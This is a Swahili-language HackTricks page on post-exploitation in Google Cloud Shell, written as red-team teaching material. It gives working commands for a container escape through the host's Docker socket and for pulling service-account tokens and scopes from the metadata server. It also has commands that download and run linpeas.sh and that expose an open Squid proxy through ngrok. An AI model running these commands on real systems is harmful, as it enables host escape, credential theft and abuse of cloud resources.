GCP - Cloud Shell Post Exploitation

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Cloud Shell

Kwa habari zaidi kuhusu Cloud Shell angalia:

pageGCP - Cloud Shell Enum

Kutoroka kwa Kontena

Tafadhali kumbuka kuwa Google Cloud Shell inaendeshwa ndani ya kontena, unaweza kutoroka kwa urahisi kwenda kwenye mwenyeji kwa kufanya:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Hii haichukuliwi kama udhaifu na google, lakini inakupa wigo mpana wa kinachoendelea katika mazingira hayo.

Zaidi ya hayo, kumbuka kwamba kutoka kwenye mwenyeji unaweza kupata ishara ya akaunti ya huduma:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Na scopes zifuatazo:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Tambua metadata kwa kutumia LinPEAS:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Baada ya kutumia https://github.com/carlospolop/bf_my_gcp_permissions na token ya Akaunti ya Huduma hakuna idhini iliyogunduliwa...

Tumia kama Proksi

Ikiwa unataka kutumia kifaa chako cha ganda la google cloud kama proksi unahitaji kukimbia amri zifuatazo (au uzijumuishe katika faili ya .bashrc):

sudo apt install -y squid

Kwa kujua tu, Squid ni seva ya proksi ya http. Unda faili ya squid.conf na mipangilio ifuatayo:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

Copy the squid.conf file to /etc/squid Hakikisha kwamba unakili faili ya squid.conf kwenda /etc/squid

sudo cp squid.conf /etc/squid

Mwishowe zindua huduma ya squid:

sudo service squid start

Tumia ngrok ili kuwezesha proksi iweze kupatikana kutoka nje:

./ngrok tcp 3128

Baada ya kukimbia nakili url ya tcp://. Ikiwa unataka kukimbia proksi kutoka kwenye kivinjari inashauriwa kuondoa sehemu ya tcp:// na namba ya mlango na kuweka mlango kwenye uga wa mlango wa mipangilio ya proksi ya kivinjari chako (squid ni seva ya proksi ya http).

Kwa matumizi bora wakati wa kuanza .bashrc faili inapaswa kuwa na mistari ifuatayo:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

Maagizo yalichukuliwa kutoka https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Angalia ukurasa huo kwa mawazo mengine ya kufanya kazi na aina yoyote ya programu (databases na hata windows) kwenye Cloud Shell.

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Last updated